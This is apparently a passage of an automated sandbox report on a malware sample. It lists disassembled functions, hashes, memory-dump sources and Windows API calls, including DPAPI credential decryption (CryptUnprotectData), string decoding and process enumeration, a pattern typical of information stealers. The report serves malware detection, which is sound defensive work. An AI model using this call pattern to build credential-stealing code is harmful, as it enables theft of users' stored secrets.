                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: YF>R$YF>R$kL|~$qN{\$qi?
                                        • API String ID: 0-3936958629
                                        • Opcode ID: 48391d95ea34132404420672ab3fc6ab5eda68c46b18a78584afee9f14948ae7
                                        • Instruction ID: 0c5423041cea354434f832b11ec3efc32f29406dd75748911e46438b971a17b5
                                        • Opcode Fuzzy Hash: 48391d95ea34132404420672ab3fc6ab5eda68c46b18a78584afee9f14948ae7
                                        • Instruction Fuzzy Hash: 49B26CF3A0C2049FE3046E2DEC8567ABBE9EFD4360F1A463DEAC5D3744E93558058692
                                        Function 00932DDE Relevance: 7.9, Strings: 5, Instructions: 1610COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: *fsy$Hk$h`7\$sKWU${
                                        • API String ID: 0-3455512912
                                        • Opcode ID: 4d9ced611dc4cff7250bbc08fe8eaf2480fab6a87db309aa5ad731b84f558a0f
                                        • Instruction ID: 59a3f14d9bc296118f308434f495c504728f6174a5075aa7f026d5432c3c9fc0
                                        • Opcode Fuzzy Hash: 4d9ced611dc4cff7250bbc08fe8eaf2480fab6a87db309aa5ad731b84f558a0f
                                        • Instruction Fuzzy Hash: 48B2D5F360C204AFE304AE2DEC8567ABBE9EF94720F16493DE6C5C3744E63598058697
                                        Function 0054F8D6 Relevance: 7.6, Strings: 6, Instructions: 123COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: \u$\u${${$}$}
                                        • API String ID: 0-582841131
                                        • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                        • Instruction ID: cd26eb31b2b9c4b0388965de62f649104e3befcf84bee789eb80076ab243cebc
                                        • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                        • Instruction Fuzzy Hash: F0416D22E19BD9C5CB058B7844A02EEBFB27FD6214F6D42AAC49D1F382C774414AD3A5
                                        Function 004EC920 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 004EC971
                                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 004EC97C
                                        • lstrcat.KERNEL32(?,00500B47), ref: 004ECA43
                                        • lstrcat.KERNEL32(?,00500B4B), ref: 004ECA57
                                        • lstrcat.KERNEL32(?,00500B4E), ref: 004ECA78
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$BinaryCryptStringlstrlen
                                        • String ID:
                                        • API String ID: 189259977-0
                                        • Opcode ID: 5eda0ec413073b2944542a22e74cc8526e422b7849c364c74c567980d3f2a0ad
                                        • Instruction ID: 9770b22a8d2575901094765f2a7bf438e0f714694e61aa9c31b00a9af406308f
                                        • Opcode Fuzzy Hash: 5eda0ec413073b2944542a22e74cc8526e422b7849c364c74c567980d3f2a0ad
                                        • Instruction Fuzzy Hash: 19415E74D0421E9BDB14DFA4DD89FFEB7B8BB88304F1042A9E509A62C0D7785A84CF95
                                        Function 004E72A0 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 004E72AD
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004E72B4
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004E72E1
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 004E7304
                                        • LocalFree.KERNEL32(?), ref: 004E730E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                        • String ID:
                                        • API String ID: 2609814428-0
                                        • Opcode ID: 044554c61bfd5e1f0a1d772f29f8827155d17c07f0dc827c6c19e83d9d86cac1
                                        • Instruction ID: ae120b999ac80accb862bd1dab316001fe0fb144095a342b863cc598278b5b21
                                        • Opcode Fuzzy Hash: 044554c61bfd5e1f0a1d772f29f8827155d17c07f0dc827c6c19e83d9d86cac1
                                        • Instruction Fuzzy Hash: AD010C75A44308BBDB14DFA8DC46F9E7778BB84B01F108545FB05AB2C0D6B4AA00DB69
                                        Function 004F9790 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004F97AE
                                        • Process32First.KERNEL32(00500ACE,00000128), ref: 004F97C2
                                        • Process32Next.KERNEL32(00500ACE,00000128), ref: 004F97D7
                                        • StrCmpCA.SHLWAPI(?,00000000), ref: 004F97EC
                                        • CloseHandle.KERNEL32(00500ACE), ref: 004F980A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 420147892-0
                                        • Opcode ID: 7066cb6124f759f2aa73d89a41dc6263851b80dd71abf25b399257aee59b7460
                                        • Instruction ID: d023ece4cd1e9ad30905201b9863bb3150bbc69d895bfb0adc547100259c1622
                                        • Opcode Fuzzy Hash: 7066cb6124f759f2aa73d89a41dc6263851b80dd71abf25b399257aee59b7460
                                        • Instruction Fuzzy Hash: C5010C75A1420CEBDB24DFA4CD44BEEB7B8BB88700F108689E50997250E7389E40CF64
                                        Function 00934D0E Relevance: 7.5, Strings: 5, Instructions: 1244COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: T/|@$rB$w]{Q$w]{Q$y[2
                                        • API String ID: 0-1813117950
                                        • Opcode ID: 3160efbc3830bb282d45e05536cab7b00b5ee73a69c19152f48b86c9bded5d2e
                                        • Instruction ID: 70154b8449794a4b85b6a3fad35721159cecea8b4d315a74c99677f50a54a1f2
                                        • Opcode Fuzzy Hash: 3160efbc3830bb282d45e05536cab7b00b5ee73a69c19152f48b86c9bded5d2e
                                        • Instruction Fuzzy Hash: 7682E7F360C200AFE304AE29EC8566AF7E9EFD4720F16893DE6C4D7344E63598058697
                                        Function 00504573 Relevance: 7.3, Strings: 2, Instructions: 4819COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: <7\h$huzx
                                        • API String ID: 0-2989614873
                                        • Opcode ID: 1d306a64b32ec80efcd30ebbf21bf8be57d4a3a31a1eaaf5b560232c1a76f8cf
                                        • Instruction ID: ba5a3d4d7376988afd3d73c57309d63ba94c1b9f49adab621915e52968e4417c
                                        • Opcode Fuzzy Hash: 1d306a64b32ec80efcd30ebbf21bf8be57d4a3a31a1eaaf5b560232c1a76f8cf
                                        • Instruction Fuzzy Hash: CD63627241EBD51ECB27CB3047B619A7F26BB1321031C49CEC9C18B5F3D690AA1AE756
                                        Function 004F9030 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CryptBinaryToStringA.CRYPT32(00000000,004E51D4,40000001,00000000,00000000,?,004E51D4), ref: 004F9050
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BinaryCryptString
                                        • String ID:
                                        • API String ID: 80407269-0
                                        • Opcode ID: cf7d29cf102896b509aecec643232b3c28dc3eb351c0346d53643ae7791487da
                                        • Instruction ID: c9f11763c81224372005b408b711e91355a15cbe5f637fb0edefbe4854da4849
                                        • Opcode Fuzzy Hash: cf7d29cf102896b509aecec643232b3c28dc3eb351c0346d53643ae7791487da
                                        • Instruction Fuzzy Hash: BF11D270204208BFDB04CF64D884FBB33A9AB89310F108559BA198B350DB79ED41CBA9
                                        Function 004F7B10 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00500DE8,00000000,?), ref: 004F7B40
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F7B47
                                        • GetLocalTime.KERNEL32(?,?,?,?,?,00500DE8,00000000,?), ref: 004F7B54
                                        • wsprintfA.USER32 ref: 004F7B83
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                                        • String ID:
                                        • API String ID: 377395780-0
                                        • Opcode ID: 05bcb4415e7411e06fb29b4f4500f26ba9c5dc224e295031d9e67ffae2f17198
                                        • Instruction ID: ac45ae6e3988e3b212764104a0bbf02e2235fe9b26d727872650764d68ee14d4
                                        • Opcode Fuzzy Hash: 05bcb4415e7411e06fb29b4f4500f26ba9c5dc224e295031d9e67ffae2f17198
                                        • Instruction Fuzzy Hash: 171118B2908118AACB149BD9DD45FBEB7B8FB8CB11F10821AF605A2280D23D5940C7B4
                                        Function 004F7BC0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0145DFB0,00000000,?,00500DF8,00000000,?,00000000,00000000), ref: 004F7BF3
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F7BFA
                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0145DFB0,00000000,?,00500DF8,00000000,?,00000000,00000000,?), ref: 004F7C0D
                                        • wsprintfA.USER32 ref: 004F7C47
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                        • String ID:
                                        • API String ID: 3317088062-0
                                        • Opcode ID: 8e0686038187763e9a22e02637ab2cadb4b997093dfe0977a9d03c98cc0da13f
                                        • Instruction ID: ec82f41b6fbe5a494586c115715bf32df26ce57db9494e0fa4447d3c910797b2
                                        • Opcode Fuzzy Hash: 8e0686038187763e9a22e02637ab2cadb4b997093dfe0977a9d03c98cc0da13f
                                        • Instruction Fuzzy Hash: CC11E1B0A09218EBEB248F54DC45FA9BB78FB40720F1043D6F60AA32C0C7781A40CB55
                                        Function 004F3970 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CoCreateInstance.COMBASE(004FE120,00000000,00000001,004FE110,00000000), ref: 004F39A8
